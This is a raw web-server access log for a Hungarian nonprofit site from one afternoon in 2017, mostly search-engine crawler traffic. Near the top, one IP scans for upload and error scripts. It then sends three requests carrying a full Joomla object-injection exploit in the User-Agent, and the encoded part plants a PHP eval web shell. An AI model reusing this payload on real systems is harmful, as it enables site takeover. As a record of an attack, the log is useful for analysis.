204.12.211.170 - - [30/Aug/2017:14:27:24 +0200] "GET /search/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:24 +0200] "POST /mp3/list/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:24 +0200] "GET /mp3/list/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:25 +0200] "POST /jingyan/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:25 +0200] "GET /jingyan/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:25 +0200] "POST /exploit/description/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:25 +0200] "GET /exploit/description/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:26 +0200] "POST /exploits/28709/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:26 +0200] "GET /exploits/28709/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:26 +0200] "POST /radiopoljubac/posts/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:26 +0200] "GET /radiopoljubac/posts/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:27 +0200] "POST /m/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:28 +0200] "GET /m/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:28 +0200] "POST /m/video/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:28 +0200] "GET /m/video/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:29 +0200] "POST /upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:29 +0200] "GET /temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:29 +0200] "POST /okolice-ilawa/chat/upload.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:29 +0200] "GET /okolice-ilawa/chat/temp/error.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
204.12.211.170 - - [30/Aug/2017:14:27:30 +0200] "GET / HTTP/1.1" 200 1010 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:207:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
204.12.211.170 - - [30/Aug/2017:14:27:31 +0200] "GET / HTTP/1.1" 200 1010 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:207:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
204.12.211.170 - - [30/Aug/2017:14:27:31 +0200] "GET /ldp.php HTTP/1.1" 404 1181 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:207:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
46.118.113.254 - - [30/Aug/2017:14:33:48 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://taraz.xkaz.org/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
46.118.113.254 - - [30/Aug/2017:14:33:48 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://taraz.xkaz.org/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
180.76.15.8 - - [30/Aug/2017:14:39:59 +0200] "GET /new/en/about_us/our_staff HTTP/1.1" 200 8818 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
207.46.13.181 - - [30/Aug/2017:14:48:43 +0200] "GET /new/hirek/hirek HTTP/1.1" 200 16616 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.181 - - [30/Aug/2017:14:49:26 +0200] "GET /kutat/REVkutatas/5PR/ HTTP/1.1" 200 49876 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.181 - - [30/Aug/2017:15:05:57 +0200] "GET /new/sites/default/files/NOSZA%20K%C3%B6zhaszn%C3%BA%20Jelent%C3%A9s%202013.pdf HTTP/1.1" 200 4905182 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
194.149.37.32 - - [30/Aug/2017:15:08:10 +0200] "GET /kutat/REVkutatas/5PR/ HTTP/1.1" 200 49876 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1"
77.75.77.17 - - [30/Aug/2017:15:24:56 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.77.17 - - [30/Aug/2017:15:25:01 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
157.55.39.145 - - [30/Aug/2017:15:27:43 +0200] "GET /aktualis/NCA/index.html HTTP/1.1" 200 50805 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.145 - - [30/Aug/2017:15:27:44 +0200] "GET /halozatok/kerekasztal/memo5/ HTTP/1.1" 200 11742 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:15:27:44 +0200] "GET /kutat/REVkutatas/3gazdalkodas/ HTTP/1.1" 200 88137 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.145 - - [30/Aug/2017:15:27:44 +0200] "GET /kutat/REVkutatas/1gazdasag/ HTTP/1.1" 200 89032 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:15:27:45 +0200] "GET /halozatok/JMCS/tagok/index.html HTTP/1.1" 200 65034 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:15:27:47 +0200] "GET /new/projektek/Menedzsment%20tr%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%A9ning HTTP/1.1" 200 7985 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.181 - - [30/Aug/2017:15:27:47 +0200] "GET /konferenciak/040memo/index.html HTTP/1.1" 200 33575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.181 - - [30/Aug/2017:15:27:48 +0200] "GET /aktualis/onfoglalkoztatas/index.html HTTP/1.1" 200 77025 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.181 - - [30/Aug/2017:15:27:49 +0200] "GET /konferenciak/07egszbbesz/07egszbpr/egszbreg/index.html HTTP/1.1" 200 181901 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
216.244.66.200 - - [30/Aug/2017:15:34:52 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:15:40:47 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:15:41:31 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
157.55.39.145 - - [30/Aug/2017:16:04:24 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
216.244.66.200 - - [30/Aug/2017:16:22:34 +0200] "GET /3kutat/REVkutatas/3gazdalkodas/index.html HTTP/1.1" 200 88272 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
77.75.78.165 - - [30/Aug/2017:16:28:21 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.78.165 - - [30/Aug/2017:16:28:26 +0200] "GET /new/sites/default/files/converter-abiword-18884.html_files/6.png HTTP/1.1" 404 7142 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
216.244.66.247 - - [30/Aug/2017:16:35:05 +0200] "GET /new/publikaciok/2007 HTTP/1.1" 200 8499 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:16:36:35 +0200] "GET /halozatok/JMCS/memo/05/index.html HTTP/1.1" 200 15044 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:16:37:09 +0200] "GET /aktualis/105onk/index.html HTTP/1.1" 200 65506 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
157.55.39.145 - - [30/Aug/2017:16:39:01 +0200] "GET /index.html HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.0 - - [30/Aug/2017:16:41:57 +0200] "GET /new/elerhetoseg HTTP/1.1" 200 7734 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:16:42:11 +0200] "GET /new/modules/node/node.css?L HTTP/1.1" 200 740 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.60 - - [30/Aug/2017:16:42:11 +0200] "GET /new/sites/default/themes/nosza/print.css?L HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:16:42:11 +0200] "GET /new/modules/system/system-menus.css?L HTTP/1.1" 200 935 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:16:42:11 +0200] "GET /new/modules/user/user.css?L HTTP/1.1" 200 1127 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:16:42:11 +0200] "GET /new/sites/default/themes/nosza/scripts/search.js HTTP/1.1" 200 466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.0 - - [30/Aug/2017:16:42:14 +0200] "GET /new/modules/system/defaults.css?L HTTP/1.1" 200 757 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.0 - - [30/Aug/2017:16:42:14 +0200] "GET /new/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1" 200 166 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.0 - - [30/Aug/2017:16:42:14 +0200] "GET /new/sites/all/modules/cck/theme/content-module.css?L HTTP/1.1" 200 2397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.0 - - [30/Aug/2017:16:42:15 +0200] "GET /new/sites/default/themes/nosza/css/menu_style.css HTTP/1.1" 200 4749 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.145 - - [30/Aug/2017:16:42:15 +0200] "GET /new/modules/filefield/filefield.css?L HTTP/1.1" 200 1986 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.145 - - [30/Aug/2017:16:42:15 +0200] "GET /new/modules/system/system.css?L HTTP/1.1" 200 10020 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.145 - - [30/Aug/2017:16:42:16 +0200] "GET /new/sites/default/themes/nosza/css/nosza.css?L HTTP/1.1" 200 10555 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
94.27.214.117 - - [30/Aug/2017:16:43:11 +0200] "GET /galateia.css HTTP/1.1" 200 1717 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:55.0) Gecko/20100101 Firefox/55.0"
94.27.214.117 - - [30/Aug/2017:16:43:11 +0200] "GET /graphics/noszalogo.gif HTTP/1.1" 200 6797 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:55.0) Gecko/20100101 Firefox/55.0"
94.27.214.117 - - [30/Aug/2017:16:43:11 +0200] "GET /kutat/REVkutatas/3gazdalkodas/index.html HTTP/1.1" 200 88137 "https://www.google.hu/" "Mozilla/5.0 (Windows NT 10.0; rv:55.0) Gecko/20100101 Firefox/55.0"
94.27.214.117 - - [30/Aug/2017:16:43:11 +0200] "GET /graphics/galas.gif HTTP/1.1" 200 913 "http://www.nosza.hu/kutat/REVkutatas/3gazdalkodas/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:55.0) Gecko/20100101 Firefox/55.0"
94.27.214.117 - - [30/Aug/2017:16:43:11 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 10.0; rv:55.0) Gecko/20100101 Firefox/55.0"
207.46.13.60 - - [30/Aug/2017:16:46:36 +0200] "GET /new/ HTTP/1.1" 200 9565 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
217.182.132.148 - - [30/Aug/2017:16:52:45 +0200] "GET /konferenciak/041memo/index.html HTTP/1.1" 200 34889 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
40.77.178.113 - - [30/Aug/2017:17:12:03 +0200] "GET /new/sites/default/files/NOSZA%20K%C3%B6zhaszn%C3%BA%20Jelent%C3%A9s%202013.pdf HTTP/1.1" 200 4370300 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
77.75.78.165 - - [30/Aug/2017:17:26:38 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.78.165 - - [30/Aug/2017:17:26:40 +0200] "GET /new/en/contact_us HTTP/1.1" 200 7166 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
89.132.18.221 - - [30/Aug/2017:17:32:19 +0200] "GET /kutat/REVkutatas/5PR/index.html HTTP/1.1" 200 49876 "https://www.google.hu/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1"
89.132.18.221 - - [30/Aug/2017:17:32:19 +0200] "GET /galateia.css HTTP/1.1" 200 1717 "http://www.nosza.hu/kutat/REVkutatas/5PR/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1"
89.132.18.221 - - [30/Aug/2017:17:32:19 +0200] "GET /graphics/noszalogo.gif HTTP/1.1" 200 6797 "http://www.nosza.hu/kutat/REVkutatas/5PR/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1"
89.132.18.221 - - [30/Aug/2017:17:32:19 +0200] "GET /graphics/galas.gif HTTP/1.1" 200 913 "http://www.nosza.hu/kutat/REVkutatas/5PR/index.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1"
217.182.132.73 - - [30/Aug/2017:17:43:23 +0200] "GET /new/hirek/publikaciok?page=1 HTTP/1.1" 200 12311 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
157.55.39.240 - - [30/Aug/2017:17:44:20 +0200] "GET /kutat/REVkutatas/2menedzsment/ HTTP/1.1" 200 146014 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.60 - - [30/Aug/2017:17:44:21 +0200] "GET /aktualis/012autopalya/level/index.html HTTP/1.1" 200 61858 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.60 - - [30/Aug/2017:17:44:21 +0200] "GET /kutat/REVkutatas/5PR/ HTTP/1.1" 200 49876 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.240 - - [30/Aug/2017:17:44:22 +0200] "GET /new/projektek/Nyitott%20jogalkot%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%82%C2%A0%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%C2%A2%C3%A2%E2%82%AC%C5%BE%C3%82%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%E2%80%A6%C3%82%C2%A1%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%A1s HTTP/1.1" 200 8100 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.60 - - [30/Aug/2017:17:44:23 +0200] "GET /new/content/civil-szervezet-%E2%80%93-t%C3%A1rsadalmi-szervezet-%E2%80%93-civil-t%C3%A1rsas%C3%A1g-az-%C3%BAj-civil-t%C3%B6rv%C3%A9ny-fogalmi-%C3%BAj%C3%ADt%C3%A1sai HTTP/1.1" 200 18203 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.60 - - [30/Aug/2017:17:44:24 +0200] "GET /aktualis/NCAvh/index.html HTTP/1.1" 200 67842 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.145 - - [30/Aug/2017:17:44:24 +0200] "GET /new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek HTTP/1.1" 200 12129 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.145 - - [30/Aug/2017:17:44:25 +0200] "GET /aktualis/108autopalya/level/index.html HTTP/1.1" 200 61871 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.60 - - [30/Aug/2017:17:47:54 +0200] "GET /new/sites/default/themes/nosza/images/logo.jpg HTTP/1.1" 200 5329 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
46.118.158.19 - - [30/Aug/2017:17:49:05 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://copro.pw/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
46.118.158.19 - - [30/Aug/2017:17:49:07 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://copro.pw/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
46.118.158.19 - - [30/Aug/2017:17:49:08 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://copro.pw/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.69.133.239 - - [30/Aug/2017:17:54:45 +0200] "GET /robots.txt HTTP/1.0" 404 1181 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
217.69.133.235 - - [30/Aug/2017:17:54:49 +0200] "GET /new/en/about_us/activity HTTP/1.1" 200 8929 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
66.249.64.22 - - [30/Aug/2017:17:57:50 +0200] "GET /new/content/gyakran-ism%C3%A9telt-k%C3%A9rd%C3%A9sek HTTP/1.1" 200 12129 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.229.164.98 - - [30/Aug/2017:18:02:32 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)"
